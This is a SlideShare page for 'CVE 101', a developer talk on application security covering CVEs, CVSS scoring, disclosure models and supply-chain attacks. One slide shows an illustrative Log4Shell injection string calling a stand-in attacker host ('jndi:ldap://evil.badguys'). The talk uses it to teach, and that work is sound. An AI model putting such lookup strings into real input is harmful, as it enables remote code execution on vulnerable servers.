SlideShare a Scribd company logo

BNYMellon - CVE 101.pdf

T
Theresa Mammarella

Sept 12, 2023

Software
1 of 39
Download to read offline
A DEVELOPER'S GUIDE TO THE WORLD OF APPLICATION SECURITY CVE 101 Theresa Mammarella
THERESA MAMMARELLA • Software Engineer @ IBM • Eclipse OpenJ9 JVM • Open source developer, community member, and speaker @t_mammarella linkedin.com/in/tmammarella
$8 TRILLION In 2023, the global annual cost of cyber crime is predicted to top Source: Security Intelligence
IF CYBERCRIME WAS A COUNTRY (BY GDP) China: $14.72 Tr. Cybercrime: $8.0 Tr. Japan: $5.06 Tr. Germany: $3.85 Tr. United States: $20.89 Tr. Canada: $1.64 Tr. Italy: $1.89 Tr. France: $2.63 Tr. India: $2.66 Tr. United Kingdom: $2.67 Tr. Source: globalpeoservices.com/top-15-countries-by-gdp-in-2022
INSIDER THREAT The potential for an insider to use their authorized access or understand of an organization to harm that organization • When an engineer is compromised by outside influence or dissatisfaction • When an engineer is poorly trained • When engineers put backdoors into a product • When remote development systems are not secured or when protections are removed • When accounts and credentials for terminated or inactive personnel remain available. Source: media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF
OUTNUMBERED SECURITY STAFF LEAVES SOFTWARE VULNERABLE AppSec Developers
Source: testbytes.net/blog/what-is-a-software-bug ECONOMICS OF FIXING A SECURITY CONCERN Time Cost of fix
AGENDA 1 SECURITY BASICS 2 VULNERABILITY TRACKING 3 DISCLOSURE PROCESS 4 SECURITY PRACTICES FOR DEVELOPERS
THE BASICS Vulnerability Threat Risk
THE BASICS Vulnerability Threat Risk x
COMMON VULNERABILITIES AND EXPOSURE (CVE) Description Year ID References
NATIONAL VULNERABILITY DATABASE
CVSS SCORE METRICS
SCORING CONTEXT MATTERS CVE-2023-36844 (CVSS 5.3) + CVE-2023-36845 (CVSS 5.3) + CVE-2023-36846 (CVSS 5.3) + CVE-2023-36847 (CVSS 5.3) = CVSS 9.8 (Critical)
SO WHAT IS THE BEST WAY TO TALK ABOUT VULNERABILITIES? • Private disclosure • Coordinated (responsible) disclosure • Full (Public) disclosure
ZERO DAY VULNERABILITY Security bug or flaw which is either unknown to the vendor does not have an official patch.
The Zero Day Window is Closing Source: Adapted from IBM X-Force / Analysis by Gartner Research (September 2016) Year of Date Reported 2006 2007 2008 2009 2010 2011 2012 2013 2104 2015 10 20 30 40 50 0 Average Days from Public Disclosure to Exploit Average 45 15 2017 2019 2021 Struts2
logger.info(“{}”, jndi:ldap://evil.badguys); LOG4J LOG4SHELL AND REMOTE CODE EXECUTION System Loader JDNI Loader http://badserver.com
CVE-2021-44228 (AKA LOG4SHELL) • Coordinated disclosure • Incomplete fix • More CVE's follow
WHAT'S THE DIFFERENCE BETWEEN THESE LINES OF CODE?
CVE-2022-3786 AND CVE-2022-3602
MOST OF THESE STORIES ARE UNTOLD Jeremy Long, founder of the OWASP Dependency Check project speculates that "only 25% of organizations report vulnerabilities to users, and only 10% of vulnerabilities are reported as Common Vulnerabilities exposure (CVE)." Sonatype State of the Software Supply Chain Report 2019
Security Practices for Developers
HOW DO I DISCLOSE A VULNERABILITY IN A RESPONSIBLE WAY? • Company Website • Security files on servers • SECURITY.md • Github private vulnerability reporting
Credit: Eddie Knight, Sonatype THE MANTRA 01 Does this touch the internet? If a feature touches the internet, we need to ensure end-to-end security from the supplier to the consumer 02 Does this take untrusted input? If a feature takes untrusted input, we need to validate it's integrity before use 03 Does this handle sensitive data? If a feature handles sensitive data, we must pay special care to encryption, handling, and storage.
SOFTWARE DEPENDENCIES Dependencies Dev Tools Applications
TYPES OF SUPPLY CHAIN ATTACKS • Typosquatting • Open source repo attacks • Build tool attacks • Dependency confusion org.leftpad vs org.leftpadd foo @ v1 foo @ v99999
HOW FAST IS YOUR RELEASE PROCESS? Sonatype: State of the Software Supply Chain 2022
SECURITY CHAMPION
RECAP • Vulnerability x Threat = Risk • CVE’s, CVSS, disclosure process • The Mantra/OWASP Top 10 • Dependency management • Release speed • Security champion programs
THANK YOU BNY MELLON! • Linux Foundation free course Developing Secure Software https://training.linuxfoundation.org/training/devel oping-secure-software-lfd121/ • OWASP Webgoat Hands on with the OWASP Top 10 https://owasp.org/www-project-webgoat/ • Foojay security posts https://foojay.io/today/category/security/ • OWASP’s list of Free for Open Source Application Security Tools https://owasp.org/www- community/Free_for_Open_Source_Application_S ecurity_Tools Presentation Slides: @t_mammarella linkedin.com/in/tmammarella KEEP IN TOUCH:

Recommended

LonghornPHP - CVE 101.pdf
LonghornPHP - CVE 101.pdfLonghornPHP - CVE 101.pdf
LonghornPHP - CVE 101.pdfTheresa Mammarella
 
JacksonvilleJUG_CVE101.pdf
JacksonvilleJUG_CVE101.pdfJacksonvilleJUG_CVE101.pdf
JacksonvilleJUG_CVE101.pdfTheresa Mammarella
 
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...DevOps Indonesia
 
Everything You Need to Know About BlueKeep
Everything You Need to Know About BlueKeepEverything You Need to Know About BlueKeep
Everything You Need to Know About BlueKeepIvanti
 
JavaZone 2023: CVE 101: A Developer's Guide to the World of Application Security
JavaZone 2023: CVE 101: A Developer's Guide to the World of Application SecurityJavaZone 2023: CVE 101: A Developer's Guide to the World of Application Security
JavaZone 2023: CVE 101: A Developer's Guide to the World of Application SecurityTheresa Mammarella
 
Edgescan 2022 Vulnerability Statistics Report
Edgescan 2022 Vulnerability Statistics ReportEdgescan 2022 Vulnerability Statistics Report
Edgescan 2022 Vulnerability Statistics ReportEoin Keary
 
2022 Vulnerability Statistics Report.pdf
2022 Vulnerability Statistics Report.pdf2022 Vulnerability Statistics Report.pdf
2022 Vulnerability Statistics Report.pdfssuserc3d7ec1
 
Patch Management Best Practices 2019
Patch Management Best Practices 2019Patch Management Best Practices 2019
Patch Management Best Practices 2019Ivanti
 

Recommended

LonghornPHP - CVE 101.pdf
LonghornPHP - CVE 101.pdfLonghornPHP - CVE 101.pdf
LonghornPHP - CVE 101.pdfTheresa Mammarella
 
JacksonvilleJUG_CVE101.pdf
JacksonvilleJUG_CVE101.pdfJacksonvilleJUG_CVE101.pdf
JacksonvilleJUG_CVE101.pdfTheresa Mammarella
 
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...
Leveraging Vulnerability Management Beyond DPR (Discovery - Prioritization - ...DevOps Indonesia
 
Everything You Need to Know About BlueKeep
Everything You Need to Know About BlueKeepEverything You Need to Know About BlueKeep
Everything You Need to Know About BlueKeepIvanti
 
JavaZone 2023: CVE 101: A Developer's Guide to the World of Application Security
JavaZone 2023: CVE 101: A Developer's Guide to the World of Application SecurityJavaZone 2023: CVE 101: A Developer's Guide to the World of Application Security
JavaZone 2023: CVE 101: A Developer's Guide to the World of Application SecurityTheresa Mammarella
 
Edgescan 2022 Vulnerability Statistics Report
Edgescan 2022 Vulnerability Statistics ReportEdgescan 2022 Vulnerability Statistics Report
Edgescan 2022 Vulnerability Statistics ReportEoin Keary
 
2022 Vulnerability Statistics Report.pdf
2022 Vulnerability Statistics Report.pdf2022 Vulnerability Statistics Report.pdf
2022 Vulnerability Statistics Report.pdfssuserc3d7ec1
 
Patch Management Best Practices 2019
Patch Management Best Practices 2019Patch Management Best Practices 2019
Patch Management Best Practices 2019Ivanti
 
Effective Prioritization Through Exploit Prediction
Effective Prioritization Through Exploit Prediction Effective Prioritization Through Exploit Prediction
Effective Prioritization Through Exploit Prediction Jonathan Cran
 
How to assign a CVE to yourself?
How to assign a CVE to yourself?How to assign a CVE to yourself?
How to assign a CVE to yourself?Ramin Farajpour Cami
 
2019 Cybersecurity Retrospective and a look forward to 2020
2019 Cybersecurity Retrospective and a look forward to 20202019 Cybersecurity Retrospective and a look forward to 2020
2019 Cybersecurity Retrospective and a look forward to 2020Jonathan Cran
 
LSI Spring Agent Open House 2014
LSI Spring Agent Open House 2014LSI Spring Agent Open House 2014
LSI Spring Agent Open House 2014Ashlie Steele
 
CyberSecurity Update Slides
CyberSecurity Update SlidesCyberSecurity Update Slides
CyberSecurity Update SlidesJim Kaplan CIA CFE
 
We explain the security flaw that's freaking out the internet
We explain the security flaw that's freaking out the internetWe explain the security flaw that's freaking out the internet
We explain the security flaw that's freaking out the internetaditi agarwal
 
Edgescan vulnerability stats report 2020
Edgescan vulnerability stats report 2020Edgescan vulnerability stats report 2020
Edgescan vulnerability stats report 2020Eoin Keary
 
Insecure magazine - 52
Insecure magazine - 52Insecure magazine - 52
Insecure magazine - 52Felipe Prado
 
2013 Security Threat Report Presentation
2013 Security Threat Report Presentation2013 Security Threat Report Presentation
2013 Security Threat Report PresentationSophos
 
Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Eoin Keary
 
RIFDHY RM ( Cybersecurity ).pdf
RIFDHY RM ( Cybersecurity ).pdfRIFDHY RM ( Cybersecurity ).pdf
RIFDHY RM ( Cybersecurity ).pdfRifDhy22
 
Code to Cloud Workshop, Shifting Security to the Left
Code to Cloud Workshop, Shifting Security to the LeftCode to Cloud Workshop, Shifting Security to the Left
Code to Cloud Workshop, Shifting Security to the LeftJamie Coleman
 
Code to Cloud Workshop.pptx
Code to Cloud Workshop.pptxCode to Cloud Workshop.pptx
Code to Cloud Workshop.pptxJamie Coleman
 
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...lior mazor
 
Cybersecurity update 12
Cybersecurity update 12Cybersecurity update 12
Cybersecurity update 12Jim Kaplan CIA CFE
 
Lumension Security - Adjusting our defenses for 2012
Lumension Security - Adjusting our defenses for 2012Lumension Security - Adjusting our defenses for 2012
Lumension Security - Adjusting our defenses for 2012Andris Soroka
 
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS SolutionGISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS SolutionShah Sheikh
 
Network Centric Cloud: Competing in a IT World with a Telecom Approach
Network Centric Cloud: Competing in a IT World with a Telecom ApproachNetwork Centric Cloud: Competing in a IT World with a Telecom Approach
Network Centric Cloud: Competing in a IT World with a Telecom ApproachEduardo Mendez Polo
 
Cyber Security – Challenges [Autosaved].pptx
Cyber Security – Challenges [Autosaved].pptxCyber Security – Challenges [Autosaved].pptx
Cyber Security – Challenges [Autosaved].pptxRambilashTudu
 
Top Application Security Trends of 2012
Top Application Security Trends of 2012Top Application Security Trends of 2012
Top Application Security Trends of 2012DaveEdwards12
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 

More Related Content

Similar to BNYMellon - CVE 101.pdf

Effective Prioritization Through Exploit Prediction
Effective Prioritization Through Exploit Prediction Effective Prioritization Through Exploit Prediction
Effective Prioritization Through Exploit Prediction Jonathan Cran
 
2019 Cybersecurity Retrospective and a look forward to 2020
2019 Cybersecurity Retrospective and a look forward to 20202019 Cybersecurity Retrospective and a look forward to 2020
2019 Cybersecurity Retrospective and a look forward to 2020Jonathan Cran
 
LSI Spring Agent Open House 2014
LSI Spring Agent Open House 2014LSI Spring Agent Open House 2014
LSI Spring Agent Open House 2014Ashlie Steele
 
We explain the security flaw that's freaking out the internet
We explain the security flaw that's freaking out the internetWe explain the security flaw that's freaking out the internet
We explain the security flaw that's freaking out the internetaditi agarwal
 
Edgescan vulnerability stats report 2020
Edgescan vulnerability stats report 2020Edgescan vulnerability stats report 2020
Edgescan vulnerability stats report 2020Eoin Keary
 
Insecure magazine - 52
Insecure magazine - 52Insecure magazine - 52
Insecure magazine - 52Felipe Prado
 
2013 Security Threat Report Presentation
2013 Security Threat Report Presentation2013 Security Threat Report Presentation
2013 Security Threat Report PresentationSophos
 
Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Eoin Keary
 
RIFDHY RM ( Cybersecurity ).pdf
RIFDHY RM ( Cybersecurity ).pdfRIFDHY RM ( Cybersecurity ).pdf
RIFDHY RM ( Cybersecurity ).pdfRifDhy22
 
Code to Cloud Workshop, Shifting Security to the Left
Code to Cloud Workshop, Shifting Security to the LeftCode to Cloud Workshop, Shifting Security to the Left
Code to Cloud Workshop, Shifting Security to the LeftJamie Coleman
 
Code to Cloud Workshop.pptx
Code to Cloud Workshop.pptxCode to Cloud Workshop.pptx
Code to Cloud Workshop.pptxJamie Coleman
 
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...lior mazor
 
Lumension Security - Adjusting our defenses for 2012
Lumension Security - Adjusting our defenses for 2012Lumension Security - Adjusting our defenses for 2012
Lumension Security - Adjusting our defenses for 2012Andris Soroka
 
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS SolutionGISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS SolutionShah Sheikh
 
Network Centric Cloud: Competing in a IT World with a Telecom Approach
Network Centric Cloud: Competing in a IT World with a Telecom ApproachNetwork Centric Cloud: Competing in a IT World with a Telecom Approach
Network Centric Cloud: Competing in a IT World with a Telecom ApproachEduardo Mendez Polo
 
Cyber Security – Challenges [Autosaved].pptx
Cyber Security – Challenges [Autosaved].pptxCyber Security – Challenges [Autosaved].pptx
Cyber Security – Challenges [Autosaved].pptxRambilashTudu
 
Top Application Security Trends of 2012
Top Application Security Trends of 2012Top Application Security Trends of 2012
Top Application Security Trends of 2012DaveEdwards12
 

Similar to BNYMellon - CVE 101.pdf (20)

Effective Prioritization Through Exploit Prediction
Effective Prioritization Through Exploit Prediction Effective Prioritization Through Exploit Prediction
Effective Prioritization Through Exploit Prediction
 
How to assign a CVE to yourself?
How to assign a CVE to yourself?How to assign a CVE to yourself?
How to assign a CVE to yourself?
 
2019 Cybersecurity Retrospective and a look forward to 2020
2019 Cybersecurity Retrospective and a look forward to 20202019 Cybersecurity Retrospective and a look forward to 2020
2019 Cybersecurity Retrospective and a look forward to 2020
 
LSI Spring Agent Open House 2014
LSI Spring Agent Open House 2014LSI Spring Agent Open House 2014
LSI Spring Agent Open House 2014
 
CyberSecurity Update Slides
CyberSecurity Update SlidesCyberSecurity Update Slides
CyberSecurity Update Slides
 
We explain the security flaw that's freaking out the internet
We explain the security flaw that's freaking out the internetWe explain the security flaw that's freaking out the internet
We explain the security flaw that's freaking out the internet
 
Edgescan vulnerability stats report 2020
Edgescan vulnerability stats report 2020Edgescan vulnerability stats report 2020
Edgescan vulnerability stats report 2020
 
Insecure magazine - 52
Insecure magazine - 52Insecure magazine - 52
Insecure magazine - 52
 
2013 Security Threat Report Presentation
2013 Security Threat Report Presentation2013 Security Threat Report Presentation
2013 Security Threat Report Presentation
 
Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...
 
RIFDHY RM ( Cybersecurity ).pdf
RIFDHY RM ( Cybersecurity ).pdfRIFDHY RM ( Cybersecurity ).pdf
RIFDHY RM ( Cybersecurity ).pdf
 
Code to Cloud Workshop, Shifting Security to the Left
Code to Cloud Workshop, Shifting Security to the LeftCode to Cloud Workshop, Shifting Security to the Left
Code to Cloud Workshop, Shifting Security to the Left
 
Code to Cloud Workshop.pptx
Code to Cloud Workshop.pptxCode to Cloud Workshop.pptx
Code to Cloud Workshop.pptx
 
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
 
Cybersecurity update 12
Cybersecurity update 12Cybersecurity update 12
Cybersecurity update 12
 
Lumension Security - Adjusting our defenses for 2012
Lumension Security - Adjusting our defenses for 2012Lumension Security - Adjusting our defenses for 2012
Lumension Security - Adjusting our defenses for 2012
 
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS SolutionGISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
GISEC 2015 Your Network in the Eyes of a Hacker - DTS Solution
 
Network Centric Cloud: Competing in a IT World with a Telecom Approach
Network Centric Cloud: Competing in a IT World with a Telecom ApproachNetwork Centric Cloud: Competing in a IT World with a Telecom Approach
Network Centric Cloud: Competing in a IT World with a Telecom Approach
 
Cyber Security – Challenges [Autosaved].pptx
Cyber Security – Challenges [Autosaved].pptxCyber Security – Challenges [Autosaved].pptx
Cyber Security – Challenges [Autosaved].pptx
 
Top Application Security Trends of 2012
Top Application Security Trends of 2012Top Application Security Trends of 2012
Top Application Security Trends of 2012
 

Recently uploaded

cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfPower Karaoke
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsMehedi Hasan Shohan
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about usDynamic Netsoft
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 

Recently uploaded (20)

cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdf
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number Systems
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software Solutions
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about us
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 

BNYMellon - CVE 101.pdf

  • 1. A DEVELOPER'S GUIDE TO THE WORLD OF APPLICATION SECURITY CVE 101 Theresa Mammarella
  • 2. THERESA MAMMARELLA • Software Engineer @ IBM • Eclipse OpenJ9 JVM • Open source developer, community member, and speaker @t_mammarella linkedin.com/in/tmammarella
  • 3. $8 TRILLION In 2023, the global annual cost of cyber crime is predicted to top Source: Security Intelligence
  • 4. IF CYBERCRIME WAS A COUNTRY (BY GDP) China: $14.72 Tr. Cybercrime: $8.0 Tr. Japan: $5.06 Tr. Germany: $3.85 Tr. United States: $20.89 Tr. Canada: $1.64 Tr. Italy: $1.89 Tr. France: $2.63 Tr. India: $2.66 Tr. United Kingdom: $2.67 Tr. Source: globalpeoservices.com/top-15-countries-by-gdp-in-2022
  • 5.
  • 6. INSIDER THREAT The potential for an insider to use their authorized access or understand of an organization to harm that organization • When an engineer is compromised by outside influence or dissatisfaction • When an engineer is poorly trained • When engineers put backdoors into a product • When remote development systems are not secured or when protections are removed • When accounts and credentials for terminated or inactive personnel remain available. Source: media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF
  • 7. OUTNUMBERED SECURITY STAFF LEAVES SOFTWARE VULNERABLE AppSec Developers
  • 8. Source: testbytes.net/blog/what-is-a-software-bug ECONOMICS OF FIXING A SECURITY CONCERN Time Cost of fix
  • 9. AGENDA 1 SECURITY BASICS 2 VULNERABILITY TRACKING 3 DISCLOSURE PROCESS 4 SECURITY PRACTICES FOR DEVELOPERS
  • 12. COMMON VULNERABILITIES AND EXPOSURE (CVE) Description Year ID References
  • 15. SCORING CONTEXT MATTERS CVE-2023-36844 (CVSS 5.3) + CVE-2023-36845 (CVSS 5.3) + CVE-2023-36846 (CVSS 5.3) + CVE-2023-36847 (CVSS 5.3) = CVSS 9.8 (Critical)
  • 16.
  • 17.
  • 18.
  • 19. SO WHAT IS THE BEST WAY TO TALK ABOUT VULNERABILITIES? • Private disclosure • Coordinated (responsible) disclosure • Full (Public) disclosure
  • 20. ZERO DAY VULNERABILITY Security bug or flaw which is either unknown to the vendor does not have an official patch.
  • 21.
  • 22. The Zero Day Window is Closing Source: Adapted from IBM X-Force / Analysis by Gartner Research (September 2016) Year of Date Reported 2006 2007 2008 2009 2010 2011 2012 2013 2104 2015 10 20 30 40 50 0 Average Days from Public Disclosure to Exploit Average 45 15 2017 2019 2021 Struts2
  • 23. logger.info(“{}”, jndi:ldap://evil.badguys); LOG4J LOG4SHELL AND REMOTE CODE EXECUTION System Loader JDNI Loader http://badserver.com
